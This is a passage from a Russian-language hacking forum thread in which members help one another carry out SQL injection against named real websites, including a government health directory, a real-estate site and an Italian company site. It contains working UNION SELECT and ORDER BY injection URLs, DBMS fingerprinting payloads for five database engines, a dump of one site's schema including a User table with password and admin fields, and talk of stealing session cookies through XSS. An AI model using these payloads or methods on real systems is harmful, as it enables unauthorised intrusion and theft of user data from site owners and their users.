Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Читал, пробовал разные варианты

    Code:
    http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+MSysObjects
    Не получается вывести диагностические ошибки о правильности или неправильности
     
    _________________________
  2. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет!
    Подскажите, по какой причине может передаваться не вся кука?
    Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет.
    add:
    На сайте wordpress 3.1.3... xss в форуме(плагин для wp).
    Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.
     
    #16962 IMMORTAL_S, 8 Jun 2011
    Last edited: 8 Jun 2011
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    IMMORTAL_S, сам ответил на вопрос. HttpOnly
     
  4. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Да, уже погуглил.
    Что-то еще можно сделать?.. как-то убрать этот флаг?
    add:
    нашел ява апплет... всем спасибо))
     
    #16964 IMMORTAL_S, 8 Jun 2011
    Last edited: 8 Jun 2011
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
     
    1 person likes this.
  6. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    спасибо, лови + :)
    пока забил на куки... нашел sqlinj
     
  7. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    В какую сторону раскручивать?
    Code:
    http://www.homesrochester.com/index.cfm?PageID=1
    пробовал как mssql, не выходит
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Крутить нужно как проведение SQL инъекций в Microsoft Access:

    http://forum.antichat.ru/thread50550.html

    но навряд ли ты ее раскрутишь
     
  9. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут тут и тут
    там 100500 БД...
     
    _________________________
    #16969 shell_c0de, 8 Jun 2011
    Last edited: 8 Jun 2011
    2 people like this.
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Вы правы, там все легко выводится:

    DB Name: hr

    Table found: sysdiagrams
    Table found: Process
    Table found: MLSArea
    Table found: ProcessStep
    Table found: FileImport
    Table found: User
    Table found: Theme
    Table found: MLSListingImage
    Table found: Agent
    Table found: MLSListing
    Table found: Office
    Table found: Table1
    Table found: Table2
    Table found: ContainerModule
    Table found: ListingPriceHistory
    Table found: PageContainer
    Table found: Portlet
    Table found: OpenHouse
    Table found: PortletProperty
    Table found: ModuleProperty
    Table found: PropertyType
    Table found: Page
    Table found: FeaturedListing
    Table found: UserSearch
    Table found: FileImportColumn
    Table found: ListingType
    Table found: Document
    Table found: MLSListingLink
    Table found: WebLog
    Table found: Container
    Table found: OpenHouseTemp
    Table found: Module
    Table found: State
    Table found: Website

    hr.User

    Column found: AddedByID
    Column found: AddedDt
    Column found: EmailAddress
    Column found: FirstName
    Column found: HomePhone
    Column found: LastName
    Column found: MobilePhone
    Column found: Password
    Column found: SysAdminFl
    Column found: UpdatedByID
    Column found: UpdatedDt
    Column found: UserID
    Column found: UserName
    Column found: UserStatus
    Column found: WorkPhone

    От меня ++++++++ и большое thanks за науку.
     
  11. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    2 вопроса:
    1 - имеется сайт, в нем Возможно есть sql inj
    пишу в урл 49-1 возвращается 48 страница при написании ' выводится пустая страница
    как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?

    2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    1. Если параметр полностью передаться в базу, то как обычно. Обычно числовые параметры не обрамляются кавычками, из за этого при проведении инъекции возможно исключить этот символ. Если нет - выложи линк. Всё надо смотреть, так же возможно из переменной удаляются символы(A-Za-z), специальные функции - здесь телепатов нет.

    2. Встроенными функциями, синтаксисом подзапросов, сравнения - потом БД гораздо больше.
     
    #16972 randman, 8 Jun 2011
    Last edited: 8 Jun 2011
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    "id=48 order by 1" например так.


    p.s.: давай ссылку. это тебе не фиши по факингу ;)
     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    MySQL
    Code:
    id=1+procedure+analyse()
    id=1+and+concat_ws(1)=1
    id=1+and+connection_id()=connection_id()
    MSSQL
    Code:
    id=1+and+len(@@version)=len(@@version)
    id=1+and+(@@TEXTSIZE>@@LANGID)
    PostgerSQL
    Code:
    id=1+and+1=1::int
    id=1+and+pg_backend_pid()=pg_backend_pid()
    id=1+and+5432=inet_server_port() 
    Access
    Code:
    id=1+and+1=StrConv(1,1)
    id=1+and+Sgn(1)=Sgn(1) 
    Oracle
    Code:
    id=1+and+to_char(22)=to_char(2)||to_char(2) 
    id=1+and+instr4(1,1,1,1)=1
    id=1+and+rownum=rownum
    Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1
     
    1 person likes this.
  15. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49

    (практикуюсь)
     
  16. AlexV

    AlexV Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    173
    Likes Received:
    550
    Reputations:
    81
    Code:
    http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
    http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -
    
    Code:
    http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
    вывод внизу
     
    3 people like this.
  17. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?
     
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+

    Сейчас видишь?

    В админку все равно не попасть
     
    #16978 FlaktW, 8 Jun 2011
    Last edited: 8 Jun 2011
  19. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    http://h1813090.stratoserver.net/files/share/8_6_2011/sraB8DgFlEWFYHrOQR1opw.jpg

    знаю я sqlhelperom уже просканил базу там даж паролей нет, просто руками же интересней
     
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    ты пробелы удали из урла
     
Thread Status:
Not open for further replies.